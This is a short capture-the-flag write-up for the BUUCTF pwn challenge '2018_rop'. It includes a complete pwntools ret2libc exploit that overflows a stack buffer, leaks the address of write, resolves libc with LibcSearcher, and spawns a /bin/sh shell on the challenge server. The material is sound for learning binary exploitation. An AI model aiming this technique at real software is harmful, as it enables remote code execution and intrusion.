BUUCTF-PWN-铁人三项(第五赛区)_2018_rop
checksec
IDA
be_nice_to_people: I don't know what this function does, and it doesn't seem to matter for this challenge.
vulnerable_function: this function contains a stack overflow. So the plan for this challenge is to call write to leak a libc address, then use it to compute the addresses of system and the "/bin/sh" string.
EXP
```python
from pwn import *
from LibcSearcher import *

context.log_level = 'debug'
p = remote('node4.buuoj.cn', 29883)
elf = ELF('./2018_rop')

main_addr = elf.sym['main']
print(hex(main_addr))
write_plt = elf.plt['write']
write_got = elf.got['write']

# Stage 1: overflow the 0x88-byte buffer plus the 4-byte saved ebp, then
# return into write@plt to print the GOT entry of write; return to main afterwards.
p.sendline(flat(b'a' * (0x88 + 0x4), p32(write_plt), p32(main_addr), p32(1), p32(write_got), p32(4)))
write_addr = u32(p.recv(4))
print(hex(write_addr))

# Identify the remote libc from the leaked write address and compute the libc base.
libc = LibcSearcher('write', write_addr)
libc_base = write_addr - libc.dump('write')
system_addr = libc_base + libc.dump('system')
binsh_addr = libc_base + libc.dump('str_bin_sh')

# Stage 2: same overflow again, this time returning into system("/bin/sh").
p.sendline(flat(b'a' * (0x88 + 0x4), p32(system_addr), p32(main_addr), p32(binsh_addr)))
p.interactive()
```
Result
I tried the LibcSearcher candidates from top to bottom: 0 didn't work, and 1 did.